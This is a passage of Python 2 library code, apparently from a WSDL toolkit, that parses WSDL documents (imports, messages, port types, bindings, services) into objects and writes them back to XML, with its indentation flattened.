child.setAttributeNS(XMLNS.BASE, 'xmlns:wsdl', namespaceURI)
child.setAttributeNS(XMLNS.BASE, 'xmlns:xsd', 'http://www.w3.org/1999/XMLSchema')
child.setAttributeNS(XMLNS.BASE, 'xmlns:soap', 'http://schemas.xmlsoap.org/wsdl/soap/')
child.setAttributeNS(XMLNS.BASE, 'xmlns:tns', self.targetNamespace)
if self.name:
child.setAttributeNS(None, 'name', self.name)
# wsdl:import
for item in self.imports:
item.toDom()
# wsdl:message
for item in self.messages:
item.toDom()
# wsdl:portType
for item in self.portTypes:
item.toDom()
# wsdl:binding
for item in self.bindings:
item.toDom()
# wsdl:service
for item in self.services:
item.toDom()
def load(self, document):
# We save a reference to the DOM document to ensure that elements
# saved as "extensions" will continue to have a meaningful context
# for things like namespace references. The lifetime of the DOM
# document is bound to the lifetime of the WSDL instance.
self.document = document
definitions = DOM.getElement(document, 'definitions', None, None)
if definitions is None:
raise WSDLError(
'Missing <definitions> element.'
)
self.version = DOM.WSDLUriToVersion(definitions.namespaceURI)
NS_WSDL = DOM.GetWSDLUri(self.version)
self.targetNamespace = DOM.getAttr(definitions, 'targetNamespace',
None, None)
self.name = DOM.getAttr(definitions, 'name', None, None)
self.documentation = GetDocumentation(definitions)
#
# Retrieve all <wsdl:import>'s, append all children of imported
# document to main document. First iteration grab all original
# <wsdl:import>'s from document, second iteration grab all
# "imported" <wsdl:imports> from document, etc break out when
# no more <wsdl:import>'s.
#
imported = []
base_location = self.location
do_it = True
while do_it:
do_it = False
for element in DOM.getElements(definitions, 'import', NS_WSDL):
location = DOM.getAttr(element, 'location')
if base_location is not None:
location = basejoin(base_location, location)
if location not in imported:
do_it = True
self._import(document, element, base_location)
imported.append(location)
else:
definitions.removeChild(element)
base_location = None
#
# No more <wsdl:import>'s, now load up all other
# WSDL information items.
#
for element in DOM.getElements(definitions, None, None):
targetNamespace = DOM.getAttr(element, 'targetNamespace')
localName = element.localName
if not DOM.nsUriMatch(element.namespaceURI, NS_WSDL):
if localName == 'schema':
tns = DOM.getAttr(element, 'targetNamespace')
reader = SchemaReader(base_url=self.imports[tns].location)
schema = reader.loadFromNode(WSDLToolsAdapter(self),
element)
# schema.setBaseUrl(self.location)
self.types.addSchema(schema)
else:
self.extensions.append(element)
continue
elif localName == 'message':
name = DOM.getAttr(element, 'name')
docs = GetDocumentation(element)
message = self.addMessage(name, docs, targetNamespace)
parts = DOM.getElements(element, 'part', NS_WSDL)
message.load(parts)
continue
elif localName == 'portType':
name = DOM.getAttr(element, 'name')
docs = GetDocumentation(element)
ptype = self.addPortType(name, docs, targetNamespace)
#operations = DOM.getElements(element, 'operation', NS_WSDL)
#ptype.load(operations)
ptype.load(element)
continue
elif localName == 'binding':
name = DOM.getAttr(element, 'name')
type = DOM.getAttr(element, 'type', default=None)
if type is None:
raise WSDLError(
'Missing type attribute for binding %s.' % name
)
type = ParseQName(type, element)
docs = GetDocumentation(element)
binding = self.addBinding(name, type, docs, targetNamespace)
operations = DOM.getElements(element, 'operation', NS_WSDL)
binding.load(operations)
binding.load_ex(GetExtensions(element))
continue
elif localName == 'service':
name = DOM.getAttr(element, 'name')
docs = GetDocumentation(element)
service = self.addService(name, docs, targetNamespace)
ports = DOM.getElements(element, 'port', NS_WSDL)
service.load(ports)
service.load_ex(GetExtensions(element))
continue
elif localName == 'types':
self.types.documentation = GetDocumentation(element)
base_location = DOM.getAttr(element, 'base-location')
if base_location:
element.removeAttribute('base-location')
base_location = base_location or self.location
reader = SchemaReader(base_url=base_location)
for item in DOM.getElements(element, None, None):
if item.localName == 'schema':
schema = reader.loadFromNode(WSDLToolsAdapter(self), item)
# XXX <types> could have been imported
#schema.setBaseUrl(self.location)
schema.setBaseUrl(base_location)
self.types.addSchema(schema)
else:
self.types.addExtension(item)
# XXX remove the attribute
# element.removeAttribute('base-location')
continue
def _import(self, document, element, base_location=None):
'''Algo take <import> element's children, clone them,
and add them to the main document. Support for relative
locations is a bit complicated. The orig document context
is lost, so we need to store base location in DOM elements
representing <types>, by creating a special temporary
"base-location" attribute, and <import>, by resolving
the relative "location" and storing it as "location".
document -- document we are loading
element -- DOM Element representing <import>
base_location -- location of document from which this
<import> was gleaned.
'''
namespace = DOM.getAttr(element, 'namespace', default=None)
location = DOM.getAttr(element, 'location', default=None)
if namespace is None or location is None:
raise WSDLError(
'Invalid import element (missing namespace or location).'
)
if base_location:
location = basejoin(base_location, location)
element.setAttributeNS(None, 'location', location)
obimport = self.addImport(namespace, location)
obimport._loaded = 1
importdoc = DOM.loadFromURL(location)
try:
if location.find('#') > -1:
idref = location.split('#')[-1]
imported = DOM.getElementById(importdoc, idref)
else:
imported = importdoc.documentElement
if imported is None:
raise WSDLError(
'Import target element not found for: %s' % location
)
imported_tns = DOM.findTargetNS(imported)
if imported_tns != namespace:
return
if imported.localName == 'definitions':
imported_nodes = imported.childNodes
else:
imported_nodes = [imported]
parent = element.parentNode
parent.removeChild(element)
for node in imported_nodes:
if node.nodeType != node.ELEMENT_NODE:
continue
child = DOM.importNode(document, node, 1)
parent.appendChild(child)
child.setAttribute('targetNamespace', namespace)
attrsNS = imported._attrsNS
for attrkey in attrsNS.keys():
if attrkey[0] == DOM.NS_XMLNS:
attr = attrsNS[attrkey].cloneNode(1)
child.setAttributeNode(attr)
#XXX Quick Hack, should be in WSDL Namespace.
if child.localName == 'import':
rlocation = child.getAttributeNS(None, 'location')
alocation = basejoin(location, rlocation)
child.setAttribute('location', alocation)
elif child.localName == 'types':
child.setAttribute('base-location', location)
finally:
importdoc.unlink()
return location
class Element:
"""A class that provides common functions for WSDL element classes."""
def __init__(self, name=None, documentation=''):
self.name = name
self.documentation = documentation
self.extensions = []
def addExtension(self, item):
item.parent = weakref.ref(self)
self.extensions.append(item)
def getWSDL(self):
"""Return the WSDL object that contains this information item."""
parent = self
while 1:
# skip any collections
if isinstance(parent, WSDL):
return parent
try: parent = parent.parent()
except: break
return None
class ImportElement(Element):
def __init__(self, namespace, location):
self.namespace = namespace
self.location = location
# def getWSDL(self):
# """Return the WSDL object that contains this Message Part."""
# return self.parent().parent()
def toDom(self):
wsdl = self.getWSDL()
ep = ElementProxy(None, DOM.getElement(wsdl.document, None))
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'import')
epc.setAttributeNS(None, 'namespace', self.namespace)
epc.setAttributeNS(None, 'location', self.location)
_loaded = None
class Types(Collection):
default = lambda self,k: k.targetNamespace
def __init__(self, parent):
Collection.__init__(self, parent)
self.documentation = ''
self.extensions = []
def addSchema(self, schema):
name = schema.targetNamespace
self[name] = schema
return schema
def addExtension(self, item):
self.extensions.append(item)
class Message(Element):
def __init__(self, name, documentation=''):
Element.__init__(self, name, documentation)
self.parts = Collection(self)
def addPart(self, name, type=None, element=None):
if self.parts.has_key(name):
raise WSDLError(
'Duplicate message part element: %s' % name
)
if type is None and element is None:
raise WSDLError(
'Missing type or element attribute for part: %s' % name
)
item = MessagePart(name)
item.element = element
item.type = type
self.parts[name] = item
return item
def load(self, elements):
for element in elements:
name = DOM.getAttr(element, 'name')
part = MessagePart(name)
self.parts[name] = part
elemref = DOM.getAttr(element, 'element', default=None)
typeref = DOM.getAttr(element, 'type', default=None)
if typeref is None and elemref is None:
raise WSDLError(
'No type or element attribute for part: %s' % name
)
if typeref is not None:
part.type = ParseTypeRef(typeref, element)
if elemref is not None:
part.element = ParseTypeRef(elemref, element)
# def getElementDeclaration(self):
# """Return the XMLSchema.ElementDeclaration instance or None"""
# element = None
# if self.element:
# nsuri,name = self.element
# wsdl = self.getWSDL()
# if wsdl.types.has_key(nsuri) and wsdl.types[nsuri].elements.has_key(name):
# element = wsdl.types[nsuri].elements[name]
# return element
#
# def getTypeDefinition(self):
# """Return the XMLSchema.TypeDefinition instance or None"""
# type = None
# if self.type:
# nsuri,name = self.type
# wsdl = self.getWSDL()
# if wsdl.types.has_key(nsuri) and wsdl.types[nsuri].types.has_key(name):
# type = wsdl.types[nsuri].types[name]
# return type
# def getWSDL(self):
# """Return the WSDL object that contains this Message Part."""
# return self.parent().parent()
def toDom(self):
wsdl = self.getWSDL()
ep = ElementProxy(None, DOM.getElement(wsdl.document, None))
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'message')
epc.setAttributeNS(None, 'name', self.name)
for part in self.parts:
part.toDom(epc._getNode())
class MessagePart(Element):
def __init__(self, name):
Element.__init__(self, name, '')
self.element = None
self.type = None
# def getWSDL(self):
# """Return the WSDL object that contains this Message Part."""
# return self.parent().parent().parent().parent()
def getTypeDefinition(self):
wsdl = self.getWSDL()
nsuri,name = self.type
schema = wsdl.types.get(nsuri, {})
return schema.get(name)
def getElementDeclaration(self):
wsdl = self.getWSDL()
nsuri,name = self.element
schema = wsdl.types.get(nsuri, {})
return schema.get(name)
def toDom(self, node):
"""node -- node representing message"""
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'part')
epc.setAttributeNS(None, 'name', self.name)
if self.element is not None:
ns,name = self.element
prefix = epc.getPrefix(ns)
epc.setAttributeNS(None, 'element', '%s:%s'%(prefix,name))
elif self.type is not None:
ns,name = self.type
prefix = epc.getPrefix(ns)
epc.setAttributeNS(None, 'type', '%s:%s'%(prefix,name))
class PortType(Element):
'''PortType has a anyAttribute, thus must provide for an extensible
mechanism for supporting such attributes. ResourceProperties is
specified in WS-ResourceProperties. wsa:Action is specified in
WS-Address.
Instance Data:
name -- name attribute
resourceProperties -- optional. wsr:ResourceProperties attribute,
value is a QName this is Parsed into a (namespaceURI, name)
that represents a Global Element Declaration.
operations
'''
def __init__(self, name, documentation=''):
Element.__init__(self, name, documentation)
self.operations = Collection(self)
self.resourceProperties = None
# def getWSDL(self):
# return self.parent().parent()
def getTargetNamespace(self):
return self.targetNamespace or self.getWSDL().targetNamespace
def getResourceProperties(self):
return self.resourceProperties
def addOperation(self, name, documentation='', parameterOrder=None):
item = Operation(name, documentation, parameterOrder)
self.operations[name] = item
return item
def load(self, element):
self.name = DOM.getAttr(element, 'name')
self.documentation = GetDocumentation(element)
self.targetNamespace = DOM.getAttr(element, 'targetNamespace')
for nsuri in WSRF_V1_2.PROPERTIES.XSD_LIST:
if DOM.hasAttr(element, 'ResourceProperties', nsuri):
rpref = DOM.getAttr(element, 'ResourceProperties', nsuri)
self.resourceProperties = ParseQName(rpref, element)
NS_WSDL = DOM.GetWSDLUri(self.getWSDL().version)
elements = DOM.getElements(element, 'operation', NS_WSDL)
for element in elements:
name = DOM.getAttr(element, 'name')
docs = GetDocumentation(element)
param_order = DOM.getAttr(element, 'parameterOrder', default=None)
if param_order is not None:
param_order = param_order.split(' ')
operation = self.addOperation(name, docs, param_order)
item = DOM.getElement(element, 'input', None, None)
if item is not None:
name = DOM.getAttr(item, 'name')
docs = GetDocumentation(item)
msgref = DOM.getAttr(item, 'message')
message = ParseQName(msgref, item)
for WSA in WSA_LIST + WSAW_LIST:
action = DOM.getAttr(item, 'Action', WSA.ADDRESS, None)
if action: break
operation.setInput(message, name, docs, action)
item = DOM.getElement(element, 'output', None, None)
if item is not None:
name = DOM.getAttr(item, 'name')
docs = GetDocumentation(item)
msgref = DOM.getAttr(item, 'message')
message = ParseQName(msgref, item)
for WSA in WSA_LIST + WSAW_LIST:
action = DOM.getAttr(item, 'Action', WSA.ADDRESS, None)
if action: break
operation.setOutput(message, name, docs, action)
for item in DOM.getElements(element, 'fault', None):
name = DOM.getAttr(item, 'name')
docs = GetDocumentation(item)
msgref = DOM.getAttr(item, 'message')
message = ParseQName(msgref, item)
for WSA in WSA_LIST + WSAW_LIST:
action = DOM.getAttr(item, 'Action', WSA.ADDRESS, None)
if action: break
operation.addFault(message, name, docs, action)
def toDom(self):
wsdl = self.getWSDL()
ep = ElementProxy(None, DOM.getElement(wsdl.document, None))
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'portType')
epc.setAttributeNS(None, 'name', self.name)
if self.resourceProperties:
ns,name = self.resourceProperties
prefix = epc.getPrefix(ns)
epc.setAttributeNS(WSRF.PROPERTIES.LATEST, 'ResourceProperties',
'%s:%s'%(prefix,name))
for op in self.operations:
op.toDom(epc._getNode())
class Operation(Element):
def __init__(self, name, documentation='', parameterOrder=None):
Element.__init__(self, name, documentation)
self.parameterOrder = parameterOrder
self.faults = Collection(self)
self.input = None
self.output = None
def getWSDL(self):
"""Return the WSDL object that contains this Operation."""
return self.parent().parent().parent().parent()
def getPortType(self):
return self.parent().parent()
def getInputAction(self):
"""wsa:Action attribute"""
return GetWSAActionInput(self)
def getInputMessage(self):
if self.input is None:
return None
wsdl = self.getPortType().getWSDL()
return wsdl.messages[self.input.message]
def getOutputAction(self):
"""wsa:Action attribute"""
return GetWSAActionOutput(self)
def getOutputMessage(self):
if self.output is None:
return None
wsdl = self.getPortType().getWSDL()
return wsdl.messages[self.output.message]
def getFaultAction(self, name):
"""wsa:Action attribute"""
return GetWSAActionFault(self, name)
def getFaultMessage(self, name):
wsdl = self.getPortType().getWSDL()
return wsdl.messages[self.faults[name].message]
def addFault(self, message, name, documentation='', action=None):
if self.faults.has_key(name):
raise WSDLError(
'Duplicate fault element: %s' % name
)
item = MessageRole('fault', message, name, documentation, action)
self.faults[name] = item
return item
def setInput(self, message, name='', documentation='', action=None):
self.input = MessageRole('input', message, name, documentation, action)
self.input.parent = weakref.ref(self)
return self.input
def setOutput(self, message, name='', documentation='', action=None):
self.output = MessageRole('output', message, name, documentation, action)
self.output.parent = weakref.ref(self)
return self.output
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'operation')
epc.setAttributeNS(None, 'name', self.name)
node = epc._getNode()
if self.input:
self.input.toDom(node)
if self.output:
self.output.toDom(node)
for fault in self.faults:
fault.toDom(node)
class MessageRole(Element):
def __init__(self, type, message, name='', documentation='', action=None):
Element.__init__(self, name, documentation)
self.message = message
self.type = type
self.action = action
def getWSDL(self):
"""Return the WSDL object that contains this information item."""
parent = self
while 1:
# skip any collections
if isinstance(parent, WSDL):
return parent
try: parent = parent.parent()
except: break
return None
def getMessage(self):
"""Return the WSDL object that represents the attribute message
(namespaceURI, name) tuple
"""
wsdl = self.getWSDL()
return wsdl.messages[self.message]
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), self.type)
if not isinstance(self.message, basestring) and len(self.message) == 2:
ns,name = self.message
prefix = epc.getPrefix(ns)
epc.setAttributeNS(None, 'message', '%s:%s' %(prefix,name))
else:
epc.setAttributeNS(None, 'message', self.message)
if self.action:
epc.setAttributeNS(WSA.ADDRESS, 'Action', self.action)
if self.name:
epc.setAttributeNS(None, 'name', self.name)
class Binding(Element):
def __init__(self, name, type, documentation=''):
Element.__init__(self, name, documentation)
self.operations = Collection(self)
self.type = type
# def getWSDL(self):
# """Return the WSDL object that contains this binding."""
# return self.parent().parent()
def getPortType(self):
"""Return the PortType object associated with this binding."""
return self.getWSDL().portTypes[self.type]
def findBinding(self, kind):
for item in self.extensions:
if isinstance(item, kind):
return item
return None
def findBindings(self, kind):
return [ item for item in self.extensions if isinstance(item, kind) ]
def addOperationBinding(self, name, documentation=''):
item = OperationBinding(name, documentation)
self.operations[name] = item
return item
def load(self, elements):
for element in elements:
name = DOM.getAttr(element, 'name')
docs = GetDocumentation(element)
opbinding = self.addOperationBinding(name, docs)
opbinding.load_ex(GetExtensions(element))
item = DOM.getElement(element, 'input', None, None)
if item is not None:
#TODO: addInputBinding?
mbinding = MessageRoleBinding('input')
mbinding.documentation = GetDocumentation(item)
opbinding.input = mbinding
mbinding.load_ex(GetExtensions(item))
mbinding.parent = weakref.ref(opbinding)
item = DOM.getElement(element, 'output', None, None)
if item is not None:
mbinding = MessageRoleBinding('output')
mbinding.documentation = GetDocumentation(item)
opbinding.output = mbinding
mbinding.load_ex(GetExtensions(item))
mbinding.parent = weakref.ref(opbinding)
for item in DOM.getElements(element, 'fault', None):
name = DOM.getAttr(item, 'name')
mbinding = MessageRoleBinding('fault', name)
mbinding.documentation = GetDocumentation(item)
opbinding.faults[name] = mbinding
mbinding.load_ex(GetExtensions(item))
mbinding.parent = weakref.ref(opbinding)
def load_ex(self, elements):
for e in elements:
ns, name = e.namespaceURI, e.localName
if ns in DOM.NS_SOAP_BINDING_ALL and name == 'binding':
transport = DOM.getAttr(e, 'transport', default=None)
style = DOM.getAttr(e, 'style', default='document')
ob = SoapBinding(transport, style)
self.addExtension(ob)
continue
elif ns in DOM.NS_HTTP_BINDING_ALL and name == 'binding':
verb = DOM.getAttr(e, 'verb')
ob = HttpBinding(verb)
self.addExtension(ob)
continue
else:
self.addExtension(e)
def toDom(self):
wsdl = self.getWSDL()
ep = ElementProxy(None, DOM.getElement(wsdl.document, None))
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'binding')
epc.setAttributeNS(None, 'name', self.name)
ns,name = self.type
prefix = epc.getPrefix(ns)
epc.setAttributeNS(None, 'type', '%s:%s' %(prefix,name))
node = epc._getNode()
for ext in self.extensions:
ext.toDom(node)
for op_binding in self.operations:
op_binding.toDom(node)
class OperationBinding(Element):
def __init__(self, name, documentation=''):
Element.__init__(self, name, documentation)
self.input = None
self.output = None
self.faults = Collection(self)
# def getWSDL(self):
# """Return the WSDL object that contains this binding."""
# return self.parent().parent().parent().parent()
def getBinding(self):
"""Return the parent Binding object of the operation binding."""
return self.parent().parent()
def getOperation(self):
"""Return the abstract Operation associated with this binding."""
return self.getBinding().getPortType().operations[self.name]
def findBinding(self, kind):
for item in self.extensions:
if isinstance(item, kind):
return item
return None
def findBindings(self, kind):
return [ item for item in self.extensions if isinstance(item, kind) ]
def addInputBinding(self, binding):
if self.input is None:
self.input = MessageRoleBinding('input')
self.input.parent = weakref.ref(self)
self.input.addExtension(binding)
return binding
def addOutputBinding(self, binding):
if self.output is None:
self.output = MessageRoleBinding('output')
self.output.parent = weakref.ref(self)
self.output.addExtension(binding)
return binding
def addFaultBinding(self, name, binding):
fault = self.get(name, None)
if fault is None:
fault = MessageRoleBinding('fault', name)
fault.addExtension(binding)
return binding
def load_ex(self, elements):
for e in elements:
ns, name = e.namespaceURI, e.localName
if ns in DOM.NS_SOAP_BINDING_ALL and name == 'operation':
soapaction = DOM.getAttr(e, 'soapAction', default=None)
style = DOM.getAttr(e, 'style', default=None)
ob = SoapOperationBinding(soapaction, style)
self.addExtension(ob)
continue
elif ns in DOM.NS_HTTP_BINDING_ALL and name == 'operation':
location = DOM.getAttr(e, 'location')
ob = HttpOperationBinding(location)
self.addExtension(ob)
continue
else:
self.addExtension(e)
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'operation')
epc.setAttributeNS(None, 'name', self.name)
node = epc._getNode()
for ext in self.extensions:
ext.toDom(node)
if self.input:
self.input.toDom(node)
if self.output:
self.output.toDom(node)
for fault in self.faults:
fault.toDom(node)
class MessageRoleBinding(Element):
def __init__(self, type, name='', documentation=''):
Element.__init__(self, name, documentation)
self.type = type
def findBinding(self, kind):
for item in self.extensions:
if isinstance(item, kind):
return item
return None
def findBindings(self, kind):
return [ item for item in self.extensions if isinstance(item, kind) ]
def load_ex(self, elements):
for e in elements:
ns, name = e.namespaceURI, e.localName
if ns in DOM.NS_SOAP_BINDING_ALL and name == 'body':
encstyle = DOM.getAttr(e, 'encodingStyle', default=None)
namespace = DOM.getAttr(e, 'namespace', default=None)
parts = DOM.getAttr(e, 'parts', default=None)
use = DOM.getAttr(e, 'use', default=None)
if use is None:
raise WSDLError(
'Invalid soap:body binding element.'
)
ob = SoapBodyBinding(use, namespace, encstyle, parts)
self.addExtension(ob)
continue
elif ns in DOM.NS_SOAP_BINDING_ALL and name == 'fault':
encstyle = DOM.getAttr(e, 'encodingStyle', default=None)
namespace = DOM.getAttr(e, 'namespace', default=None)
name = DOM.getAttr(e, 'name', default=None)
use = DOM.getAttr(e, 'use', default=None)
if use is None or name is None:
raise WSDLError(
'Invalid soap:fault binding element.'
)
ob = SoapFaultBinding(name, use, namespace, encstyle)
self.addExtension(ob)
continue
elif ns in DOM.NS_SOAP_BINDING_ALL and name in (
'header', 'headerfault'
):
encstyle = DOM.getAttr(e, 'encodingStyle', default=None)
namespace = DOM.getAttr(e, 'namespace', default=None)
message = DOM.getAttr(e, 'message')
part = DOM.getAttr(e, 'part')
use = DOM.getAttr(e, 'use')
if name == 'header':
_class = SoapHeaderBinding
else:
_class = SoapHeaderFaultBinding
message = ParseQName(message, e)
ob = _class(message, part, use, namespace, encstyle)
self.addExtension(ob)
continue
elif ns in DOM.NS_HTTP_BINDING_ALL and name == 'urlReplacement':
ob = HttpUrlReplacementBinding()
self.addExtension(ob)
continue
elif ns in DOM.NS_HTTP_BINDING_ALL and name == 'urlEncoded':
ob = HttpUrlEncodedBinding()
self.addExtension(ob)
continue
elif ns in DOM.NS_MIME_BINDING_ALL and name == 'multipartRelated':
ob = MimeMultipartRelatedBinding()
self.addExtension(ob)
ob.load_ex(GetExtensions(e))
continue
elif ns in DOM.NS_MIME_BINDING_ALL and name == 'content':
part = DOM.getAttr(e, 'part', default=None)
type = DOM.getAttr(e, 'type', default=None)
ob = MimeContentBinding(part, type)
self.addExtension(ob)
continue
elif ns in DOM.NS_MIME_BINDING_ALL and name == 'mimeXml':
part = DOM.getAttr(e, 'part', default=None)
ob = MimeXmlBinding(part)
self.addExtension(ob)
continue
else:
self.addExtension(e)
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), self.type)
node = epc._getNode()
for item in self.extensions:
if item: item.toDom(node)
class Service(Element):
def __init__(self, name, documentation=''):
Element.__init__(self, name, documentation)
self.ports = Collection(self)
def getWSDL(self):
return self.parent().parent()
def addPort(self, name, binding, documentation=''):
item = Port(name, binding, documentation)
self.ports[name] = item
return item
def load(self, elements):
for element in elements:
name = DOM.getAttr(element, 'name', default=None)
docs = GetDocumentation(element)
binding = DOM.getAttr(element, 'binding', default=None)
if name is None or binding is None:
raise WSDLError(
'Invalid port element.'
)
binding = ParseQName(binding, element)
port = self.addPort(name, binding, docs)
port.load_ex(GetExtensions(element))
def load_ex(self, elements):
for e in elements:
self.addExtension(e)
def toDom(self):
wsdl = self.getWSDL()
ep = ElementProxy(None, DOM.getElement(wsdl.document, None))
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), "service")
epc.setAttributeNS(None, "name", self.name)
node = epc._getNode()
for port in self.ports:
port.toDom(node)
class Port(Element):
def __init__(self, name, binding, documentation=''):
Element.__init__(self, name, documentation)
self.binding = binding
# def getWSDL(self):
# return self.parent().parent().getWSDL()
def getService(self):
"""Return the Service object associated with this port."""
return self.parent().parent()
def getBinding(self):
"""Return the Binding object that is referenced by this port."""
wsdl = self.getService().getWSDL()
return wsdl.bindings[self.binding]
def getPortType(self):
"""Return the PortType object that is referenced by this port."""
wsdl = self.getService().getWSDL()
binding = wsdl.bindings[self.binding]
return wsdl.portTypes[binding.type]
def getAddressBinding(self):
"""A convenience method to obtain the extension element used
as the address binding for the port."""
for item in self.extensions:
if isinstance(item, SoapAddressBinding) or \
isinstance(item, HttpAddressBinding):
return item
raise WSDLError(
'No address binding found in port.'
)
def load_ex(self, elements):
for e in elements:
ns, name = e.namespaceURI, e.localName
if ns in DOM.NS_SOAP_BINDING_ALL and name == 'address':
location = DOM.getAttr(e, 'location', default=None)
ob = SoapAddressBinding(location)
self.addExtension(ob)
continue
elif ns in DOM.NS_HTTP_BINDING_ALL and name == 'address':
location = DOM.getAttr(e, 'location', default=None)
ob = HttpAddressBinding(location)
self.addExtension(ob)
continue
else:
self.addExtension(e)
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), "port")
epc.setAttributeNS(None, "name", self.name)
ns,name = self.binding
prefix = epc.getPrefix(ns)
epc.setAttributeNS(None, "binding", "%s:%s" %(prefix,name))
node = epc._getNode()
for ext in self.extensions:
ext.toDom(node)
class SoapBinding:
def __init__(self, transport, style='rpc'):
self.transport = transport
self.style = style
def getWSDL(self):
return self.parent().getWSDL()
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLSoapBindingUri(wsdl.version), 'binding')
if self.transport:
epc.setAttributeNS(None, "transport", self.transport)
if self.style:
epc.setAttributeNS(None, "style", self.style)
class SoapAddressBinding:
def __init__(self, location):
self.location = location
def getWSDL(self):
return self.parent().getWSDL()
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLSoapBindingUri(wsdl.version), 'address')
epc.setAttributeNS(None, "location", self.location)
class SoapOperationBinding:
def __init__(self, soapAction=None, style=None):
self.soapAction = soapAction
self.style = style
def getWSDL(self):
return self.parent().getWSDL()
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLSoapBindingUri(wsdl.version), 'operation')
if self.soapAction:
epc.setAttributeNS(None, 'soapAction', self.soapAction)
if self.style:
epc.setAttributeNS(None, 'style', self.style)
class SoapBodyBinding:
def __init__(self, use, namespace=None, encodingStyle=None, parts=None):
if not use in ('literal', 'encoded'):
raise WSDLError(
'Invalid use attribute value: %s' % use
)
self.encodingStyle = encodingStyle
self.namespace = namespace
if type(parts) in (type(''), type(u'')):
parts = parts.split()
self.parts = parts
self.use = use
def getWSDL(self):
return self.parent().getWSDL()
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLSoapBindingUri(wsdl.version), 'body')
epc.setAttributeNS(None, "use", self.use)
epc.setAttributeNS(None, "namespace", self.namespace)
class SoapFaultBinding:
def __init__(self, name, use, namespace=None, encodingStyle=None):
if not use in ('literal', 'encoded'):
raise WSDLError(
'Invalid use attribute value: %s' % use
)
self.encodingStyle = encodingStyle
self.namespace = namespace
self.name = name
self.use = use
def getWSDL(self):
return self.parent().getWSDL()
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLSoapBindingUri(wsdl.version), 'body')
epc.setAttributeNS(None, "use", self.use)
epc.setAttributeNS(None, "name", self.name)
if self.namespace is not None:
epc.setAttributeNS(None, "namespace", self.namespace)
if self.encodingStyle is not None:
epc.setAttributeNS(None, "encodingStyle", self.encodingStyle)
class SoapHeaderBinding:
def __init__(self, message, part, use, namespace=None, encodingStyle=None):
if not use in ('literal', 'encoded'):
raise WSDLError(
'Invalid use attribute value: %s' % use
)
self.encodingStyle = encodingStyle
self.namespace = namespace
self.message = message
self.part = part
self.use = use
tagname = 'header'
class SoapHeaderFaultBinding(SoapHeaderBinding):
tagname = 'headerfault'
class HttpBinding:
def __init__(self, verb):
self.verb = verb
class HttpAddressBinding:
def __init__(self, location):
self.location = location
class HttpOperationBinding:
def __init__(self, location):
self.location = location
class HttpUrlReplacementBinding:
pass
class HttpUrlEncodedBinding:
pass
class MimeContentBinding:
def __init__(self, part=None, type=None):
self.part = part
self.type = type
class MimeXmlBinding:
def __init__(self, part=None):
self.part = part
class MimeMultipartRelatedBinding:
def __init__(self):
self.parts = []
def load_ex(self, elements):
for e in elements:
ns, name = e.namespaceURI, e.localName
if ns in DOM.NS_MIME_BINDING_ALL and name == 'part':
self.parts.append(MimePartBinding())
continue
class MimePartBinding:
def __init__(self):
self.items = []
def load_ex(self, elements):
for e in elements:
ns, name = e.namespaceURI, e.localName
if ns in DOM.NS_MIME_BINDING_ALL and name == 'content':
part = DOM.getAttr(e, 'part', default=None)
type = DOM.getAttr(e, 'type', default=None)
ob = MimeContentBinding(part, type)
self.items.append(ob)
continue
elif ns in DOM.NS_MIME_BINDING_ALL and name == 'mimeXml':
part = DOM.getAttr(e, 'part', default=None)
ob = MimeXmlBinding(part)
self.items.append(ob)
continue
elif ns in DOM.NS_SOAP_BINDING_ALL and name == 'body':
encstyle = DOM.getAttr(e, 'encodingStyle', default=None)
namespace = DOM.getAttr(e, 'namespace', default=None)
parts = DOM.getAttr(e, 'parts', default=None)
use = DOM.getAttr(e, 'use', default=None)
if use is None:
raise WSDLError(
'Invalid soap:body binding element.'
)
ob = SoapBodyBinding(use, namespace, encstyle, parts)
self.items.append(ob)
continue
class WSDLError(Exception):
pass
def DeclareNSPrefix(writer, prefix, nsuri):
if writer.hasNSPrefix(nsuri):
return
writer.declareNSPrefix(prefix, nsuri)
def ParseTypeRef(value, element):
parts = value.split(':', 1)
if len(parts) == 1:
return (DOM.findTargetNS(element), value)
nsuri = DOM.findNamespaceURI(parts[0], element)
return (nsuri, parts[1])
def ParseQName(value, element):
nameref = value.split(':', 1)
if len(nameref) == 2:
nsuri = DOM.findNamespaceURI(nameref[0], element)
name = nameref[-1]
else:
nsuri = DOM.findTargetNS(element)
name = nameref[-1]
return nsuri, name
def GetDocumentation(element):
docnode = DOM.getElement(element, 'documentation', None, None)
if docnode is not None:
return DOM.getElementText(docnode)
return ''
def GetExtensions(element):
return [ item for item in DOM.getElements(element, None, None)
if item.namespaceURI != DOM.NS_WSDL ]
def GetWSAActionFault(operation, name):
"""Find wsa:Action attribute, and return value or WSA.FAULT
for the default.
"""
attr = operation.faults[name].action
if attr is not None:
return attr
return WSA.FAULT
def GetWSAActionInput(operation):
"""Find wsa:Action attribute, and return value or the default."""
attr = operation.input.action
if attr is not None:
return attr
